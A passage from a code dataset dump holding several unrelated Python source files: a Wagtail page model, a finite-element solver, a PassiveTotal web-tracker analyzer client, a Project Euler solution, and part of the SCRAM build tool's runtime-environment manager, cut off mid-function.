verbose_name='Subtitle',)\n functions_description = models.TextField(null=True, blank=True, verbose_name='Description',)\n functions_cta_text = models.CharField(max_length=1000, null=True, blank=True, verbose_name='CTA text',)\n functions_cta_link = models.ForeignKey(\n 'core_functions.CoreFunctionIndexPage',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n related_name='+',\n verbose_name='Core Function Index CTA link',\n help_text='Choose a core function index page to link to for the Call to Action(normally some index page)'\n )\n\n search_fields = StandardPage.search_fields + [\n index.SearchField('title'),\n index.SearchField('body'),\n ]\n\n standard_page_content_panels = [item for item in StandardPage.content_panels if not(isinstance(item, FieldPanel) and item.field_name=='body')]\n\n content_panels = [\n StreamFieldPanel('body'),\n ]\n\n core_function_panel = [\n MultiFieldPanel([\n FieldPanel('functions_title'),\n FieldPanel('functions_sub_title'),\n FieldPanel('functions_description'),\n FieldPanel('functions_cta_text'),\n FieldPanel('functions_cta_link'),\n ]),\n InlinePanel('functions', min_num=1),\n ]\n\n mvm_panels = [\n MultiFieldPanel([\n FieldPanel('mission_title'),\n FieldPanel('mission_sub_title'),\n FieldPanel('mission_description'),\n FieldPanel('mission_icon'),\n ], heading=\"mission\"),\n\n MultiFieldPanel([\n FieldPanel('vision_title'),\n FieldPanel('vision_sub_title'),\n FieldPanel('vision_description'),\n FieldPanel('vision_icon'),\n ], heading=\"vision\"),\n\n MultiFieldPanel([\n FieldPanel('mandate_title'),\n FieldPanel('mandate_sub_title'),\n FieldPanel('mandate_description'),\n FieldPanel('mandate_icon'),\n ], heading=\"mandate\"),\n ]\n\n carousel_panel = [\n MultiFieldPanel(\n [InlinePanel(\"carousel_images\", min_num=0, label=\"Image\")],\n heading=\"Carousel Images\",\n ),\n ]\n\n edit_handler = TabbedInterface([\n ObjectList(standard_page_content_panels, heading='page & hero'),\n ObjectList(carousel_panel, heading='carousel images'),\n ObjectList(content_panels, heading='body'), \n ObjectList(core_function_panel, heading='core functions'), \n ObjectList(executive_panels, heading='Executives'), \n ObjectList(organization_panels, heading='Related Organizations'), \n ObjectList(mvm_panels, heading='mvm'), \n ObjectList(StandardPage.promote_panels, heading='promote'),\n ObjectList(StandardPage.settings_panels, heading='settings'),\n ])\n\n def get_executives(self):\n return self.executives.filter(executive__featured=True).all()\n\n def get_related_organizations(self):\n return self.related_organizations.filter(organization__featured=True).all()\n \n def get_context(self, request):\n context = super(AboutUsPage, self).get_context(request)\n context['executives'] = self.get_executives()\n context['related_organizations'] = self.get_related_organizations()\n context['regional_profiles'] = self.get_children().type(RegionalProfilePage).live()\n return context","repo_name":"eliblurr/nrsa","sub_path":"nsra/about_us/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15869966799","text":"from result import Result\n\nclass FemGrid(object):\n\n def __init__(self, elements, nodes):\n self.__elements=elements\n self.__nodes=nodes\n self.__kg=[[]]\n self.__fg=[]\n self.__result=Result()\n self.__dTau=0\n self.__tauArray=[]\n\n def getElement(self, i):\n return self.__elements[i]\n def getNode(self, i):\n return self.__nodes[i]\n\n def getKg(self):\n return self.__kg\n\n def getFg(self):\n return self.__fg\n\n def getNodesR(self):\n r=[]\n for node in self.__nodes:\n r.append(node.getR())\n return r\n\n def setTemperatures(self, temperatures):\n for n in self.__nodes:\n n.setTemp(temperatures.pop(0))\n\n def getTauArray(self):\n return self.__tauArray\n\n def setLocalMatrixAndVectors(self, globalData):\n for element in self.__elements:\n element.setLocalMatrixAndVector(globalData, self.__dTau)\n element.printLocalMatrixAndVector()\n\n def setGlobalMatrixAndVector(self, nh):\n self.__kg=[[0]* nh for i in range(0,nh)]\n self.__fg=[0 for i in range(0,nh)]\n\n for i in range(0, nh-1):\n ke=self.__elements[i].getKe()\n self.__kg[i][i] += ke[0][0]\n self.__kg[i][i+1] += ke[0][1]\n self.__kg[i+1][i] += ke[1][0]\n self.__kg[i+1][i+1] += ke[1][1]\n\n fe=self.__elements[i].getFe()\n self.__fg[i] += fe[0]\n self.__fg[i+1] += fe[1]\n\n def solveSystemOfEquatios(self):\n temperatures = self.__result.solveSystemOfEquation(self.__kg, self.__fg)\n return temperatures\n\n def simulateProcess(self, globalData):\n self.__dTau = globalData.getTauMax() / globalData.getNTime()\n tau = self.__dTau;\n\n while tau <= globalData.getTauMax():\n self.setLocalMatrixAndVectors(globalData)\n self.setGlobalMatrixAndVector(globalData.getNh())\n temperatures = self.solveSystemOfEquatios()\n self.setTemperatures(temperatures)\n self.__tauArray.append(tau)\n tau += self.__dTau\n\n return self.__result\n\n\n def printGlobalMatrixAndVector(self):\n print(\"Macierz globalna [K]: \\n\")\n for x in self.__kg:\n print(x)\n\n print(\"wektor globalny [F]: \\n\")\n\n for x in self.__fg:\n print(x)\n\n","repo_name":"karolskora1993/MES2","sub_path":"femgrid.py","file_name":"femgrid.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"3851985604","text":"from functools import partial\nfrom passivetotal.analyzer._common import (\n RecordList, Record, FirstLastSeen, PagedRecordList, ForPandas, AnalyzerError, AnalyzerAPIError,\n FilterDomains\n)\nfrom passivetotal.analyzer import get_api, get_config, get_object\n\n\n\nclass TrackerHistory(RecordList, PagedRecordList, ForPandas):\n\n \"\"\"Historical web component data.\"\"\"\n\n def _get_shallow_copy_fields(self):\n return ['_totalrecords','_query']\n \n def _get_sortable_fields(self):\n return ['firstseen','lastseen','category','label','hostname']\n \n def _get_dict_fields(self):\n return ['totalrecords']\n \n @property\n def as_dict(self):\n d = super().as_dict\n d.update({\n 'distinct_hostnames': [ str(host) for host in self.hostnames ],\n 'distinct_categories': list(self.categories),\n 'distinct_values': list(self.values)\n })\n return d\n \n def parse(self, api_response):\n \"\"\"Parse an API response.\"\"\"\n self._totalrecords = api_response.get('totalRecords', 0)\n self._records = []\n for result in api_response.get('results', []):\n self._records.append(TrackerRecord(result, self._query))\n\n @property\n def hostnames(self):\n \"\"\"List of unique hostnames in the tracker record list.\"\"\"\n return set(\n get_object(host) for host in set([record.hostname for record in self if record.hostname is not None])\n )\n \n @property\n def categories(self):\n \"\"\"List of unique categories (types) in the tracker record list.\"\"\"\n return set([record.category for record in self if record.category is not None])\n \n @property\n def values(self):\n \"\"\"List of unique tracker values in the tracker record list.\"\"\"\n return set([record.value for record in self if record.value is not None])\n\n\n\nclass TrackerRecord(Record, FirstLastSeen, ForPandas):\n\n \"\"\"Record of an observed trackers.\"\"\"\n\n def __init__(self, api_response, query=None):\n self._firstseen = api_response.get('firstSeen')\n self._lastseen = api_response.get('lastSeen')\n self._value = api_response.get('attributeValue')\n self._trackertype = api_response.get('attributeType')\n self._hostname = api_response.get('hostname')\n self._query = query\n \n def __str__(self):\n return '[{0.trackertype}] \"{0.value}\" ({0.firstseen_date} to {0.lastseen_date})'.format(self)\n \n def __repr__(self):\n return ''.format(self)\n \n def _get_dict_fields(self):\n return ['str:firstseen','str:lastseen','value','trackertype','hostname']\n \n def to_dataframe(self):\n \"\"\"Render this object as a Pandas DataFrame.\n\n :rtype: :class:`pandas.DataFrame`\n \"\"\"\n pd = self._get_pandas()\n cols = ['query','firstseen','lastseen','trackertype','value','hostname']\n as_d = {\n 'query': self._query,\n 'firstseen': self.firstseen,\n 'lastseen': self.lastseen,\n 'trackertype': self.trackertype,\n 'value': self.value,\n 'hostname': self.hostname,\n }\n return pd.DataFrame([as_d], columns=cols)\n\n @property\n def value(self):\n \"\"\"Value of the tracker.\"\"\"\n return self._value\n\n @property\n def hostname(self):\n \"\"\"Hostname the tracker was observed on.\"\"\"\n return self._hostname\n\n @property\n def trackertype(self):\n \"\"\"Type or category of web tracker.\"\"\"\n return self._trackertype\n \n @property\n def category(self):\n \"\"\"Category or type of web tracker; alias of `TrackerRecord.trackertype`.\"\"\"\n return self._trackertype\n \n @property\n def tracker(self):\n \"\"\"Tracker as a `Tracker` object to aid pivoting to other related IPs or hosts.\n \n :rtype: :class:`passivetotal.analyzer.trackers.Tracker`\n \"\"\"\n return Tracker(self.trackertype, self.value)\n\n\n\nclass TrackerSearchResults(RecordList, PagedRecordList, ForPandas, FilterDomains):\n\n \"\"\"Search results from a tracker query.\"\"\"\n\n def __init__(self, query=None, tracker_type=None, search_type=None):\n self._query = query\n self._tracker_type = tracker_type\n self._search_type = search_type\n self._records = []\n self._totalrecords = None\n self._pagination_current_page = 0\n self._pagination_page_size = 2000 # API is fixed at this page size\n self._pagination_has_more = True\n self._pagination_callable = partial(\n get_api('Trackers').search_trackers,\n value=self._query, \n tracker_type=self._tracker_type, \n result_type=self._search_type\n )\n\n def _get_shallow_copy_fields(self):\n return ['_totalrecords','_query', '_pagination_current_page','_pagination_page_size',\n '_pagination_callable','_pagination_has_more']\n \n def _get_sortable_fields(self):\n return ['firstseen','lastseen','searchtype','trackertype','query','host']\n \n def _get_dict_fields(self):\n return ['totalrecords']\n \n def _pagination_parse_page(self, api_response):\n self._totalrecords = api_response.get('totalRecords')\n results = api_response['results']\n self._records.extend([\n TrackerSearchRecord(r, self._query, self._tracker_type, self._search_type) for r in results\n ])\n \n @property\n def as_dict(self):\n d = super().as_dict\n return d\n \n @property\n def query(self):\n \"\"\"Query used to return this set of search results.\"\"\"\n return self._query\n \n @property\n def totalrecords(self):\n \"\"\"Total number of available records; may be greater than the number of results returned by the API.\"\"\"\n return self._totalrecords\n\n\n\nclass TrackerSearchRecord(Record, FirstLastSeen, ForPandas):\n\n \"\"\"Record representing a single search result in a tracker search.\"\"\"\n\n def __init__(self, api_response, query=None, tracker_type=None, search_type=None):\n self._firstseen = api_response.get('firstSeen')\n self._lastseen = api_response.get('lastSeen')\n self._query = query\n self._trackertype = tracker_type\n self._searchtype = search_type\n self._entity = api_response.get('entity',None)\n \n def __str__(self):\n return '[{0.trackertype}] @ \"{0.entity}\" ({0.firstseen_date} to {0.lastseen_date})'.format(self)\n \n def __repr__(self):\n return ' {0.entity}\">'.format(self)\n \n def _get_dict_fields(self):\n return ['str:firstseen','str:lastseen','query','str:host','trackertype','searchtype']\n \n def to_dataframe(self):\n \"\"\"Render this object as a Pandas DataFrame.\n\n :rtype: :class:`pandas.DataFrame`\n \"\"\"\n pd = self._get_pandas()\n cols = ['query','host','trackertype','firstseen','lastseen','searchtype']\n as_d = {\n 'query': self._query,\n 'host': self.host,\n 'trackertype': self.trackertype,\n 'firstseen': self.firstseen,\n 'lastseen': self.lastseen,\n 'searchtype': self.searchtype\n }\n return pd.DataFrame([as_d], columns=cols)\n\n @property\n def entity(self):\n \"\"\"Entity where a tracker was found - typically a hostname or an IP address.\n \n Returns the actual value returned by the API in the 'entity' response field.\n \"\"\"\n return self._entity\n \n @property\n def host(self):\n \"\"\"Host where a tracker was found.\n \n Returns either an `analyzer.Hostname` or `analyzer.IPAddress` object depending on\n the type of search which produced this record.\n \"\"\"\n if self._searchtype == 'addresses':\n return get_object(self.entity, type='IPAddress')\n elif self._searchtype == 'hosts' or self._searchtype is None:\n return get_object(self.entity, type='Hostname')\n else:\n return None\n \n @property\n def query(self):\n \"\"\"Query that produced this search result.\"\"\"\n return self._query\n \n @property\n def searchtype(self):\n \"\"\"Type of search (hostnames or IP addresses) that produced this search result.\n \n This value defines the type of records returned - either hostnames or IPs.\"\"\"\n return self._searchtype\n \n @property\n def trackertype(self):\n \"\"\"Type of tracker found on the entity (host) referenced in this search result.\"\"\"\n return self._trackertype\n\n @property\n def tracker(self):\n \"\"\"Tracker as a `Tracker` object to aid pivoting to other related IPs or hosts.\n \n :rtype: :class:`passivetotal.analyzer.trackers.Tracker`\n \"\"\"\n return Tracker(self.trackertype, self.value)\n\n\n\nclass Tracker:\n\n \"\"\"A web tracker with a type and value.\n \n In addition to a simple type/value mapping, this class also provides\n `ips` and `hostname` properties to find other entities that\n have the same type/value tuple.\n \"\"\"\n\n _instances = {}\n\n def __new__(cls, trackertype, value):\n valuehash = hash((trackertype, value))\n self = cls._instances.get(valuehash)\n if not self:\n self = cls._instances[valuehash] = object.__new__(cls)\n self._type = trackertype\n self._value = value\n self._ips = None\n self._hostnames = None\n return self\n \n def __str__(self):\n return '{0.trackertype}:{0.value}'.format(self)\n \n def __repr__(self):\n return ''.format(str(self))\n \n def _api_search(self, searchtype):\n attrs = {\n 'hosts': '_hostnames',\n 'addresses': '_ips'\n }\n results = TrackerSearchResults(self._value, self._type, searchtype)\n results.load_all_pages()\n setattr(self, attrs[searchtype], results)\n \n @property\n def trackertype(self):\n \"\"\"Type of tracker as defined by RiskIQ analysts.\"\"\"\n return self._type\n \n @property\n def value(self):\n \"\"\"Tracker value as observed.\"\"\"\n return self._value\n \n @property\n def observations_by_ip(self):\n \"\"\"IP addresses of hosts where this tracker was observed.\n \n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if self._ips is None:\n self._api_search('addresses')\n return self._ips\n \n @property\n def observations_by_hostname(self):\n \"\"\"Hostnames of sites where this tracker was observed.\n \n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if self._hostnames is None:\n self._api_search('hosts')\n return self._hostnames\n\n\n\nclass HasTrackers:\n\n \"\"\"An object with web tracker history.\"\"\"\n\n _REFERENCE_TRACKER_TYPES = {\n 'Hostname': ['DocumentBaseHost','HTTrackSourceHost','MarkOfTheWebSourceHost','SingleFileSourceHost'],\n 'IPAddress': ['DocumentBaseAddress','HTTrackSourceAddress','MarkOfTheWebSourceAddress','SingleFileSourceAddress']\n }\n\n def _api_get_trackers(self, start_date=None, end_date=None):\n \"\"\"Query the host attributes API for web tracker history.\n \n Only the first page of results is returned; pagination is not\n supported. Check the totalrecords attribute of the response object\n to determine if more records are available.\n \"\"\"\n query=self.get_host_identifier()\n response = get_api('HostAttributes').get_trackers(\n query=query,\n start=start_date,\n end=end_date\n )\n self._trackers = TrackerHistory(response, query)\n return self._trackers\n \n def _api_get_tracker_references(self):\n \"\"\"Query the host attributes API and search trackers for multiple trackertypes and searchtypes.\"\"\"\n self._tracker_references = TrackerSearchResults(query=self.get_host_identifier())\n tracker_types = self._REFERENCE_TRACKER_TYPES.get('Hostname' if self.is_hostname else 'IPAddress')\n for trackertype in tracker_types:\n for searchtype in ['addresses','hosts']:\n try:\n result = get_api('HostAttributes').search_trackers_by_type(\n query=self.get_host_identifier(),\n type=trackertype,\n searchType=searchtype\n )\n self._tracker_references.parse(result, trackertype, searchtype)\n except AnalyzerAPIError as e:\n if e.status_code == 404:\n continue\n raise e\n return self._tracker_references\n\n @property\n def trackers(self):\n \"\"\"History of trackers observed on this host.\n\n Trackers are analytics codes, social network accounts, and other unique\n details extracted from the web page by RiskIQ crawlers based on detection\n logic programmed by RiskIQ analysts.\n\n :rtype: :class:`passivetotal.analyzer.trackers.TrackerHistory`\n \"\"\"\n if getattr(self, '_trackers', None) is not None:\n return self._trackers\n config = get_config()\n return self._api_get_trackers(\n start_date=config['start_date'],\n end_date=config['end_date']\n )\n \n @property\n def tracker_references(self):\n \"\"\"Hosts with trackers that have this host as the value.\n \n Performs several API queries to create a composite result; create an instance of\n :class:`passivetotal.analyzer.Tracker` if you need more granular control.\n\n :rtype: :class:`passivetotal.analyzer.trackers.TrackerSearchResults`\n \"\"\"\n if getattr(self, '_tracker_references', None) is not None:\n return self._tracker_references\n return self._api_get_tracker_references()","repo_name":"passivetotal/python_api","sub_path":"passivetotal/analyzer/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":14036,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"94"} +{"seq_id":"28294409674","text":"def check(a, b, c):\n if a**2 + b**2 == c**2:\n return True\n else:\n return False\n\n\nfor a in range(1, 1000):\n for b in range(a, 1000 - a):\n c = 1000 - a - b\n if check(a, b, c):\n print(a*b*c)\n","repo_name":"lraczyn/Project-Euler","sub_path":"009.py","file_name":"009.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35580906908","text":"from os import environ, stat\nfrom os.path import exists, join, abspath\nfrom sys import stdout\nimport re\nfrom base64 import b64decode, b64encode\nfrom json import dump, load\nimport SCRAM\nfrom SCRAM.BuildSystem.ToolManager import ToolManager\n\n\nRUNTIME_SHELLS = {'-sh': 'BOURNE', '-csh': 'TCSH', '-win': 'CYGWIN'}\nORIG_SCRAM_ARCH = ''\ntry:\n ORIG_SCRAM_ARCH = environ['SCRAM_ARCH']\nexcept:\n pass\n\nclass RuntimeEnv(object):\n def __init__(self, area):\n self.recursive = True if 'SCRAM_RTBOURNE_SET' in environ else False\n self.optional_paths = {}\n self.area = area\n for e in [i for i in environ.keys() if i.startswith('SCRAMV3_BACKUP_')] :\n environ[e[15:]] = environ[e]\n del environ[e]\n self.OENV = environ.copy()\n self.OENV['SCRAM_ARCH'] = ORIG_SCRAM_ARCH\n self.env_backup_prefix = 'SRT_'\n self.skip_env = re.compile('^(_|PWD|PROMPT_COMMAND|SCRAM_.+|SCRAMV1_.+|SCRAM|LOCALTOP|RELEASETOP|BASE_PATH)$')\n self.shell = {}\n self.shell['BOURNE'] = {'EQUALS': '=', 'SEP': ':', 'EXPORT': 'export', 'UNEXPORT': 'unset'}\n self.shell['TCSH'] = {'EQUALS': ' ', 'SEP': ':', 'EXPORT': 'setenv', 'UNEXPORT': 'unsetenv'}\n self.shell['CYGWIN'] = {'EQUALS': '=', 'SEP': ';', 'EXPORT': 'unset', 'UNEXPORT': 'set'}\n self.shell['RTBOURNE'] = self.shell['BOURNE']\n self.env = {'variables': {}, 'paths': {}}\n self.force_tools_env = {}\n self.skip_runtime = {}\n self._unsetenv = False\n self.ignore_env = {}\n self._read_ignore_env()\n return\n\n def runtimebuildenv(self):\n save_env = {}\n environ[\"SCRAM_RUNTIME_TYPE\"]=\"BUILD\"\n for k in ['LD_PRELOAD']:\n if k in environ:\n save_env[k] = environ[k]\n del environ[k]\n self.save('RTBOURNE')\n for k, v in save_env.items():\n if k in self.ignore_env: continue\n environ[k] = v\n self.setenv(\"RTBOURNE\")\n if 'rtstring' in self.env:\n if 'RTBOURNE' in self.env['rtstring']:\n for e in self.env['rtstring']['RTBOURNE']:\n if e in self.ignore_env: continue\n environ[e] = self.env['rtstring']['RTBOURNE'][e]\n return environ\n\n def _fixpathvar(self, var, sep):\n if (var in environ) and (environ[var] != ''):\n return '%s%s' % (sep, environ[var])\n return ''\n\n def _fixlibenv(self, var):\n if environ['SCRAM_ARCH'].startswith('osx') and var == 'LD_LIBRARY_PATH':\n var = 'DYLD_FALLBACK_LIBRARY_PATH'\n return var\n\n def setenv(self, shell, ostream=None):\n if self.recursive:\n return\n if not ostream:\n ostream = stdout\n shell_data = self.shell[shell]\n sep = shell_data['SEP']\n udata = {}\n data = []\n if not self._unsetenv:\n env_prefix = self.env_backup_prefix\n env = self._runtime()\n for d in env['variables']:\n for var, val in d.items():\n udata[var] = 1\n data.append({var: val[0]})\n for var in env['path']:\n if '_SRTOPT_' in var:\n continue\n udata[var] = 1\n benv = '%s%s%s' % (env_prefix, var, self.backup_type[var])\n val = self._fixpathvar(var, sep)\n if benv in environ:\n val = environ[benv] + val\n data.append({var: val})\n if shell == 'RTBOURNE':\n data.append({'SCRAM_RTBOURNE_SET': environ['SCRAMRT_SET']})\n for var, val in env['xenv'].items():\n udata[var] = 1\n data.append({var: val})\n for var, val in environ.items():\n if var not in udata:\n data.insert(0, {var: val})\n udata[var] = 1\n oenv = self.OENV\n unset = \"\"\n unset_vars = \"\"\n for v in oenv:\n if v in udata:\n continue\n if v in environ:\n del environ[v]\n if shell == 'RTBOURNE':\n continue\n unset += \" %s\" % v\n if not v.startswith('SCRAMRT_') and \\\n not v.endswith('_SCRAMRT') and \\\n not v.endswith('_SCRAMRTDEL'):\n unset_vars += \" %s\\n\" % v\n if unset:\n if unset_vars and not self._unsetenv:\n SCRAM.printerror(\"**** Following environment variables are going to be unset.\\n%s\" % unset_vars)\n print(\"%s %s;\" % (shell_data['UNEXPORT'], unset), file=ostream)\n for d in data:\n for var, val in d.items():\n if var in self.ignore_env: continue\n environ[var] = val\n if shell == 'RTBOURNE': continue\n if var != 'PATH' and var in oenv:\n if val == oenv[var]:\n continue\n print('%s %s%s\\\"%s\\\";' % (shell_data['EXPORT'], var,\n shell_data['EQUALS'], val), file=stdout)\n return True\n\n def save(self, shell, ostream=None):\n if self.recursive:\n return\n if not ostream:\n ostream = stdout\n if 'SCRAMRT_SET' in environ:\n self._restore_environment(shell)\n env_prefix = self.env_backup_prefix\n env = self._runtime()\n data = []\n sep = self.shell[shell]['SEP']\n backup_vars = \"\"\n for h in env['variables']:\n for (name, value) in h.items():\n if name in self.ignore_env: continue\n btype = '_SCRAMRT'\n if name not in environ:\n btype += 'DEL'\n else:\n backup_vars += \"%s=%s;\" % (name, environ[name])\n data.append({'%s%s%s' % (env_prefix, name, btype): value[0]})\n if backup_vars:\n backup_vars = backup_vars.strip(';')\n data.append({'SCRAMRT_BACKUP_ENV': b64encode(backup_vars.encode('utf-8')).decode('utf-8')})\n self.backup_type = {}\n opt = {}\n regexp = re.compile('^(.+?)_SRTOPT_(.+)$')\n for (name, value) in env['path'].items():\n m = regexp.match(name)\n if m:\n if m.group(2) in self.ignore_env: continue\n if m.group(1) in self.optional_paths:\n if not m.group(2) in opt:\n opt[m.group(2)] = {}\n opt[m.group(2)][m.group(1)] = 1\n continue\n btype = '_SCRAMRT'\n if name not in environ:\n btype += 'DEL'\n data.append({'%s%s%s' % (env_prefix, name, btype): self._cleanpath(sep.join(value), sep)})\n self.backup_type[name] = btype\n for v in opt:\n btype = ''\n nbtype = ''\n if v in self.backup_type:\n btype = self.backup_type[v]\n nbtype = btype\n else:\n nbtype = '_SCRAMRT'\n if v in environ:\n nbtype += 'DEL'\n for t in opt[v]:\n xindex = len(data)\n pval = ''\n if btype:\n k = '%s%s%s' % (env_prefix, v, btype)\n i = -1\n for d in data:\n i += 1\n if k not in d:\n continue\n xindex = i\n pval = d[k]\n break\n nval = sep.join(env['path']['%s_SRTOPT_%s' % (t, v)])\n if pval:\n nval = '%s%s%s' % (nval, sep, pval)\n if xindex == len(data):\n data.append({})\n data[xindex]['%s%s%s' % (env_prefix, v, nbtype)] = self._cleanpath(nval, sep)\n scram_set = ''\n for e in ['SCRAM_PROJECTNAME', 'SCRAM_PROJECTVERSION', 'SCRAM_ARCH', 'SCRAM_VERSION']:\n scram_set += '%s:' % environ[e]\n data.append({'SCRAMRT_SET':\n '%s%s' % (scram_set, env_prefix)})\n for v in data:\n for name, value in v.items():\n environ[name] = value.replace('\"', '\\\\\"').replace('`', '\\\\`')\n return\n\n def optional_env(self, types=[]):\n self.optional_paths = {}\n for t in types:\n self.optional_paths[t.upper()] = 1\n return\n\n def unsetenv(self, shell):\n if 'SCRAMRT_SET' not in environ:\n return\n self._unsetenv = True\n self._restore_environment(shell)\n self.setenv(shell)\n self._unsetenv = False\n return\n\n def _restore_environment(self, shell):\n global environ\n penv = environ['SCRAMRT_SET'].split(':')\n del environ['SCRAMRT_SET']\n sep = self.shell[shell]['SEP']\n backup_env = environ.copy()\n prefix = self.env_backup_prefix if len(penv)<5 else penv[4]\n bvar = 'SCRAMRT_BACKUP_ENV'\n bval = {} if bvar not in environ else \\\n dict([item.split('=', 1)\n for item in b64decode(environ[bvar]).decode('utf-8').split(';')\n if item])\n for name, value in environ.items():\n if name.startswith('SCRAMRT_'):\n del backup_env[name]\n elif self.skip_env.match(name):\n continue\n elif name.endswith('_SCRAMRT') or name.endswith('_SCRAMRTDEL'):\n del backup_env[name]\n type = ''\n var = name\n if name.endswith('_SCRAMRTDEL'):\n var = name[:-11]\n type = 'DEL'\n else:\n var = name[:-8]\n if prefix:\n var = var[len(prefix):]\n if var in backup_env:\n if type == 'DEL':\n del backup_env[var]\n continue\n val = backup_env[var]\n if var in bval:\n val = bval[var]\n elif val == value:\n val = ''\n else:\n regex = re.compile('^(.*?%s|)%s(%s.*|)$' % (sep, re.escape(value), sep))\n m = regex.match(val)\n if m:\n val = '%s%s' % (m.group(1), m.group(2))\n val = val.strip(sep)\n val = val.replace('%s%s' % (sep, sep), sep)\n if not val:\n del backup_env[var]\n else:\n backup_env[var] = val\n for e in backup_env:\n environ[e] = backup_env[e]\n for e in list(environ.keys()):\n if not e in backup_env:\n del environ[e]\n\n def _update_overrides(self):\n if 'PATH' in self.env['rtstring']['path']:\n override = join(SCRAM.BASEPATH, 'share', 'overrides', 'bin')\n if exists(override):\n self.env['rtstring']['path']['PATH'].insert(0, override)\n override = join(SCRAM.BASEPATH, 'share', 'overrides', 'python')\n if exists(override):\n for v in [\"PYTHONPATH\", \"PYTHON27PATH\", \"PYTHON3PATH\"]:\n if v in self.env['rtstring']['path']:\n self.env['rtstring']['path'][v].insert(0, override)\n for e in [\"PATH\", \"LD_LIBRARY_PATH\", \"PYTHONPATH\", \"PYTHON27PATH\", \"PYTHON3PATH\"]:\n if e not in self.env['rtstring']['path']:\n continue\n ev = \"SCRAM_PREFIX_%s\" % e\n if ev not in self.OENV:\n continue\n for override in self.OENV[ev].split(\":\"):\n if exists(override):\n self.env['rtstring']['path'][e].insert(0, override)\n if 'SCRAM_IGNORE_RUNTIME_HOOK' not in self.OENV:\n self._runtime_hooks()\n if 'SCRAM_IGNORE_SITE_RUNTIME_HOOK' not in self.OENV:\n self._runtime_hooks(SCRAM.get_site_hooks())\n return\n\n def _runtime_hooks(self, hook_dir=None):\n if not hook_dir: hook_dir = self.area.config()\n debug='SCRAM_HOOKS_DEBUG' in self.OENV\n hook = join(hook_dir, 'SCRAM', 'hooks', 'runtime-hook')\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK: %s\" % hook)\n if not exists(hook):\n return\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK: Found\")\n regexp = re.compile(\n '^runtime:((path:(append|prepend|remove|replace):[a-zA-Z0-9-_]+)|(variable:[a-zA-Z0-9-_]+))=(.*)$',\n re.I)\n err, out = SCRAM.run_command('SCRAMRT_SET=true %s 2>&1' % hook)\n if debug:\n SCRAM.printerror(\"SCRAM_HOOK:\\n%s\" % out)\n for line in out.split('\\n'):\n if not regexp.match(line):\n continue\n vals = line.split('=', 1)\n items = vals[0].split(':')\n vtype = items[1].lower()\n if vtype == 'path':\n if vtype not in self.env[\"rtstring\"]:\n self.env[\"rtstring\"][vtype] = {}\n cache = self.env[\"rtstring\"][vtype]\n vtype = items[2].lower()\n evar = items[3]\n if (vtype == 'replace'):\n xitems = vals[1].split(\"=\", 1)\n vals[1] = xitems[0]\n vals.append(xitems[1])\n elif (vtype != 'remove') and (evar not in cache):\n cache[evar] = []\n for d in vals[1].split(':'):\n d = d.strip()\n if not d:\n continue\n if vtype == 'append':\n cache[evar].append(d)\n elif vtype == 'prepend':\n cache[evar].insert(0, d)\n elif vtype == 'remove':\n if d in cache[evar]:\n cache[evar].remove(d)\n elif vtype == 'replace':\n npath = []\n for x in cache[evar]:\n if x != d:\n npath.append(x)\n else:\n for r in vals[2].split(\":\"):\n npath.append(r)\n cache[evar] = npath\n elif vtype == 'variable':\n if 'variables' not in self.env['rtstring']:\n self.env['rtstring']['variables'] = []\n found = False\n for i, val in enumerate(self.env['rtstring']['variables']):\n if items[2] in val:\n val[items[2]] = [vals[1]]\n found = True\n break\n if not found:\n self.env['rtstring']['variables'].append({items[2]: [vals[1]]})\n return\n\n def _runtime(self):\n if 'rtstring' in self.env:\n return self.env['rtstring']\n self.env['rtstring'] = {'variables': [], 'path': {}, 'RTBOURNE': {}, 'xenv': {}}\n cache = join(self.area.archdir(), 'RuntimeCache.json')\n if exists(cache):\n st = stat(cache)\n if (st.st_size > 0):\n toolcache = self.area.toolcachename()\n if st.st_mtime >= stat(toolcache).st_mtime:\n with open(cache) as ref:\n self.env['rtstring'] = load(ref)\n self._update_overrides()\n return self.env['rtstring']\n toolmanager = ToolManager(self.area)\n tools = toolmanager.loadtools()\n otools = toolmanager.toolsdata()\n self.force_tools_env = {'self': 1, environ['SCRAM_PROJECTNAME'].lower(): 1}\n self.skip_runtime = {}\n if 'self' in tools:\n stool = tools['self']\n otools.append(stool)\n if 'FLAGS' in stool:\n for f in ['NO_EXTERNAL_RUNTIME', 'SKIP_TOOLS_SYMLINK', 'DEFAULT_COMPILER']:\n if f not in stool['FLAGS']:\n continue\n if f == 'NO_EXTERNAL_RUNTIME':\n for x in stool['FLAGS'][f]:\n x = self._fixlibenv(x)\n self.skip_runtime[self._fixlibenv(x)] = 1\n elif f == 'SKIP_TOOLS_SYMLINK':\n for t in stool['FLAGS'][f]:\n self.force_tools_env[t.lower()] = 1\n elif f == 'DEFAULT_COMPILER':\n self.env['rtstring']['RTBOURNE'][f] = stool['FLAGS'][f][0]\n compilertools = []\n for t in otools[::-1]:\n if 'SCRAM_COMPILER' in t:\n compilertools.append(t)\n else:\n self._toolenv(t)\n for t in compilertools:\n self._toolenv(t)\n for k in list(self.env):\n if k != 'rtstring':\n del self.env[k]\n try:\n with open(cache, 'w') as ref:\n dump(self.env['rtstring'], ref, sort_keys=True, indent=2)\n except (OSError, IOError) as e:\n pass\n self._update_overrides()\n return self.env['rtstring']\n\n def _toolenv(self, tool):\n tname = tool['TOOLNAME']\n if (tname != 'self') and ('FLAGS' in tool) and ('SKIP_TOOL_SYMLINKS' in tool['FLAGS']):\n self.force_tools_env[tname] = 1\n if ('RUNTIME' not in tool) or \\\n not tool['RUNTIME']:\n return\n projTool = True if tname == environ['SCRAM_PROJECTNAME'].lower() else False\n gmake = \"\"\n for trtvar, trtval in tool['RUNTIME'].items():\n if trtvar in self.ignore_env: continue\n if 